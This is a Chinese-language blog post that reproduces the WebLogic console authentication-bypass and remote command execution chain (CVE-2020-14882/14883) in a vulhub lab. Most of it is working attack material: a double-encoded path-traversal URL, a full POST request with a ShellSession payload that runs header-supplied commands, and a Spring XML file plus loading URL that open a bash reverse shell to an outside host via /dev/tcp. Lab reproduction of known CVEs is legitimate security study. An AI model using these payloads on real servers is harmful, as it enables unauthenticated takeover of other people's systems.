Weblogic管理控制台未授权远程命令执行漏洞复现（cve-2020-14882/cve-2020-14883）

旧城等待， 2023-10-08 19:32 30阅读 0赞

#### 目录 ####

*  漏洞描述
 *  影响版本
 *  漏洞复现
 *  权限绕过漏洞
 *  远程命令执行

**声明：本文仅供学习参考，其中涉及的一切资源均来源于网络，请勿用于任何非法行为，否则您将自行承担相应后果，本人不承担任何法律及连带责任。**

## 漏洞描述 ##

Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中，Oracle官方修复了两个安全漏洞，分别是CVE-2020-14882和CVE-2020-14883；CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台，CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链，可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。

## 影响版本 ##

WebLogic 10.3.6.0.0  
WebLogic 12.1.3.0.0  
WebLogic 12.2.1.3.0  
WebLogic 12.2.1.4.0  
WebLogic 14.1.1.0.0

## 漏洞复现 ##

漏洞环境搭建使用vulhub，不在赘述。环境起来后，访问http://192.168.10.171:7001/console,即可访问到后台登录页面  
![在这里插入图片描述][c8e666dd00b04360af1c6ba028096798.png]

## 权限绕过漏洞 ##

访问url: http://192.168.10.171:7001/console/css/%252e%252e%252fconsole.portal，即可未授权访问到管理后台页面（有时第一次访问会出现404错误，在访问一下就可以了）  
![在这里插入图片描述][95978e03344447ddb8c65095112a53ba.png]  
但当前用户为低权限用户，无法安装应用，也无法直接执行命令。此次引出第二个漏洞cve-2020-14883.

## 远程命令执行 ##

这个漏洞的利用方式有两种，一是通过com.tangosol.coherence.mvel2.sh.ShellSession，二是通过com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext。  
首先利用第一种方式，即com.tangosol.coherence.mvel2.sh.ShellSession，利用的POC如下：

POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
    Host: 192.168.26.103:7001
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1
    Pragma: no-cache
    Cache-Control: no-cache
    Content-Type: application/x-www-form-urlencoded
    cmd: whoami
    Content-Length: 1258
    
    _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();
    weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();
    java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");
    field.setAccessible(true);
    Object obj = field.get(adapter);
    weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);
    String cmd = req.getHeader("cmd");
    String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};
    if (cmd != null) {
        String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next();
        weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req);
        res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));
        res.getServletOutputStream().flush();
        res.getWriter().write("");
    }executeThread.interrupt();
    ");

![在这里插入图片描述][33ddebf5a9a344cc886ac5eb69298b82.png]  
反弹shell

![在这里插入图片描述][28d607d7755748819c5eefaaaa0e07cd.png]  
查看反弹shell成功

![在这里插入图片描述][778aaa3e7b3841679aab9fd732aa39fd.png]  
但这个利用方法只能在Weblogic 12.2.1以上版本利用，因为10.3.6并不存在com.tangosol.coherence.mvel2.sh.ShellSession类。  
com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext是一种更为通杀的方法，最早在CVE-2019-2725被提出，对于所有Weblogic版本均有效。

首先构造一个xml文件，并将其放到Weblogic可以访问到的服务器上（服务器上可以使用python起http服务）

<?xml version="1.0" encoding="UTF-8" ?>
    <beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
        <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
            <constructor-arg>
              <list>
                <value>bash</value>
                <value>-c</value>
                <value><![CDATA[bash -i >& /dev/tcp/192.168.8.14/3340 0>&1]]></value>
              </list>
            </constructor-arg>
        </bean>
    </beans>

然后通过如下URL，即可让Weblogic加载这个XML，并执行其中的命令：

`http://192.168.10.171:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(“http://192.168.8.14:8888/poc.xml”)`

查看反弹shell成功

![在这里插入图片描述][41e6bb382fc64b4d8b61604159606cd5.png]

[c8e666dd00b04360af1c6ba028096798.png]: https://img-blog.csdnimg.cn/c8e666dd00b04360af1c6ba028096798.png
[95978e03344447ddb8c65095112a53ba.png]: https://img-blog.csdnimg.cn/95978e03344447ddb8c65095112a53ba.png
[33ddebf5a9a344cc886ac5eb69298b82.png]: https://img-blog.csdnimg.cn/33ddebf5a9a344cc886ac5eb69298b82.png
[28d607d7755748819c5eefaaaa0e07cd.png]: https://img-blog.csdnimg.cn/28d607d7755748819c5eefaaaa0e07cd.png
[778aaa3e7b3841679aab9fd732aa39fd.png]: https://img-blog.csdnimg.cn/778aaa3e7b3841679aab9fd732aa39fd.png
[41e6bb382fc64b4d8b61604159606cd5.png]: https://img-blog.csdnimg.cn/41e6bb382fc64b4d8b61604159606cd5.png